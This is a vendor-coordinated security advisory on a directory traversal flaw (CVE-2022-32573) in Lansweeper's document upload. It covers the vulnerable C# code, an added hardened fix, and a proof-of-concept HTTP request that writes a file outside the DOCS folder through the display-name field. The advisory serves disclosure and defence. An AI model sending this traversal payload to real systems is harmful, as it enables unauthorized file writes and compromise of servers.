CVE-2022-32573
A directory traversal vulnerability exists in the AssetActions.aspx addDoc functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Lansweeper lansweeper 10.1.1.0
lansweeper - https://www.lansweeper.com/
9.9 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management, compliance and audit purposes.
An exploitable directory traversal vulnerability is associated with the following action: Assets -> choose any asset -> Docs -> Add document. The vulnerable code is located in the \LS\WS\AssetActions.cs file.
Let us take a close look at the vulnerable source code:
Line 1   else if (page.IsPostBack && current.Request["action"] == "addDoc")
Line 2   {
Line 3
Line 4       if (fileup.PostedFile != null && fileup.PostedFile.ContentLength > 0)
Line 5       {
Line 6           string text5 = Path.GetFileName(fileup.PostedFile.FileName);
Line 7           string text6 = Guid.NewGuid().ToString();
Line 8           int value6 = int.Parse(current.Request["assetId"]);
Line 9           string item = DateTime.Now.ToString(User.Current().DateTimeFormat);
Line 10          WebUser webUser2 = (WebUser)current.Session["Webuser"];
Line 11          string text7 = ((!webUser2.IsAuthenticated) ? webUser2.Displayname : (webUser2.UserDomain + "\\" + webUser2.UserName));
Line 12          string[] allowedExtensions = General.AllowedExtensions;
Line 13          string text8 = Path.GetExtension(fileup.FileName).ToLower();
Line 14          if (txtdocname.Text != "")
Line 15          {
Line 16              text5 = txtdocname.Text + text8;
Line 17          }
Line 18          bool flag = false;
Line 19          string[] array = allowedExtensions;
Line 20          for (int i = 0; i < array.Length; i++)
Line 21          {
Line 22              if (array[i] == text8)
Line 23              {
Line 24                  flag = true;
Line 25              }
Line 26          }
Line 27          string text9 = HttpContext.Current.Server.MapPath("~") + "\\DOCS\\";
Line 28          string filename = text9 + text6 + "_" + text5;
Line 29          if (!Directory.Exists(text9))
Line 30          {
Line 31              Directory.CreateDirectory(text9);
Line 32          }
Line 33          try
Line 34          {
Line 35              if (!flag)
Line 36              {
Line 37                  text4 = text4 + "file extension ('" + text8 + "') is not allowed.";
Line 38                  throw new CustomException(text4);
Line 39              }
Line 40              fileup.PostedFile.SaveAs(filename);
When uploading a file (document), an attacker can use the txtdocname variable (Display name in the web GUI) to provide an alternative filename, which is not sanitized at all against directory traversal. Unlike the uploaded file's own name, which passes through Path.GetFileName on line 6, the txtdocname value replaces it on line 16 without any path stripping.
That name is then simply concatenated with the path to the DOCS directory on lines 27-28.
The lack of proper txtdocname sanitization allows an attacker to upload a file to an arbitrary destination within the file system.
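A hardened form of the filename construction on lines 14-28, added here as an illustration; it is not code from the advisory and not the vendor's patch. The names DocPathBuilder and BuildDocPath and the sample root path are hypothetical, and the extension is assumed to have already passed the allow-list check.

```csharp
using System;
using System.IO;

// Added illustration; DocPathBuilder and BuildDocPath are hypothetical names.
public static class DocPathBuilder
{
    // Characters that must never appear in a display name, on any platform.
    private static readonly char[] PathChars = { '\\', '/', ':' };

    public static string BuildDocPath(string docsRoot, string displayName, string extension)
    {
        if (string.IsNullOrWhiteSpace(displayName))
            throw new ArgumentException("Display name is empty.");

        string leaf = displayName + extension;

        // Reject separators, drive colons and other invalid file name characters.
        if (leaf.IndexOfAny(PathChars) >= 0 ||
            leaf.IndexOfAny(Path.GetInvalidFileNameChars()) >= 0)
            throw new ArgumentException("Display name contains path characters.");

        // Canonicalize the root and make sure it ends with a separator, so that
        // a sibling such as "DOCS_old" cannot pass the prefix check below.
        string root = Path.GetFullPath(docsRoot);
        if (!root.EndsWith(Path.DirectorySeparatorChar.ToString()))
            root += Path.DirectorySeparatorChar;

        // Resolve the final path and confirm it is still inside the root.
        string candidate = Path.GetFullPath(
            Path.Combine(root, Guid.NewGuid().ToString() + "_" + leaf));
        if (!candidate.StartsWith(root, StringComparison.OrdinalIgnoreCase))
            throw new UnauthorizedAccessException("Resolved path escapes the DOCS directory.");

        return candidate;
    }

    public static void Main()
    {
        // Constructed inputs: a benign name, then the txtdocname value from the advisory's request.
        // The root path is a constructed placeholder, not the product's real install path.
        foreach (string name in new[] { "Q2 inventory", @"..\..\..\HACKED" })
        {
            try { Console.WriteLine(BuildDocPath(@"C:\inetpub\app\DOCS", name, ".ini")); }
            catch (Exception ex) { Console.WriteLine("rejected: " + ex.Message); }
        }
    }
}
```

The character check alone stops the request shown in this advisory; the canonicalize-and-compare step is kept as a second, independent guard in case the input reaches the path builder by another route.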
REQUEST
POST /AssetActions.aspx?action=addDoc&assetId=10 HTTP/1.1
Host: 192.168.0.102:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------23614898975253108242957970650
Content-Length: 644
Origin: http://192.168.0.102:81
Connection: close
Referer: http://192.168.0.102:81/AssetActions.aspx?action=addDoc&assetId=10
Cookie: UserSettings=language=1; ASP.NET_SessionId=etcnsycpe3rytjmue2efl5co; custauth=username=hacker&userdomain=; __RequestVerificationToken_Lw__=zP2evPOU4gLNF/pF3R1XPsIP7ceImHsHKoqy7GfYwDnIwHnDJKt3r5+0bFTXNS/XpEAiyEFBVT2ekfSLIPgVMULtvi8Ae4qLSYcUO0UH90vcERUKMi72E3I2yEJexWSyNKlA8gcXlfMPYbc0a94Dji44b2cNn4aS0KGOSUQBn/0=
Upgrade-Insecure-Requests: 1

-----------------------------23614898975253108242957970650
Content-Disposition: form-data; name="__VIEWSTATE"

-----------------------------23614898975253108242957970650
Content-Disposition: form-data; name="fileup"; filename="doc_name_ppt.magicext.ini"
Content-Type: application/vnd.ms-powerpoint

ATTACKER CONTROLED CONTENT
-----------------------------23614898975253108242957970650
Content-Disposition: form-data; name="txtdocname"

..\..\..\HACKED
-----------------------------23614898975253108242957970650
Content-Disposition: form-data; name="btnOK"

Upload
-----------------------------23614898975253108242957970650--
RESPONSE
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
x-frame-options: SAMEORIGIN
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 06 Jun 2022 14:53:18 GMT
Connection: close
Content-Length: 159

<script>window.parent.closeIframe(["10","..\\..\\..\\HACKED.ini","6405c669-95ed-4469-bb1a-ae4665868d1a","..\\Unauthenticated","06/06/2022 16:53:18"]);</script>
2022-06-27 - Vendor Disclosure
2022-11-29 - Vendor Patch Release
2022-12-01 - Public Release
Discovered by Marcin 'Icewall' Noga of Cisco Talos.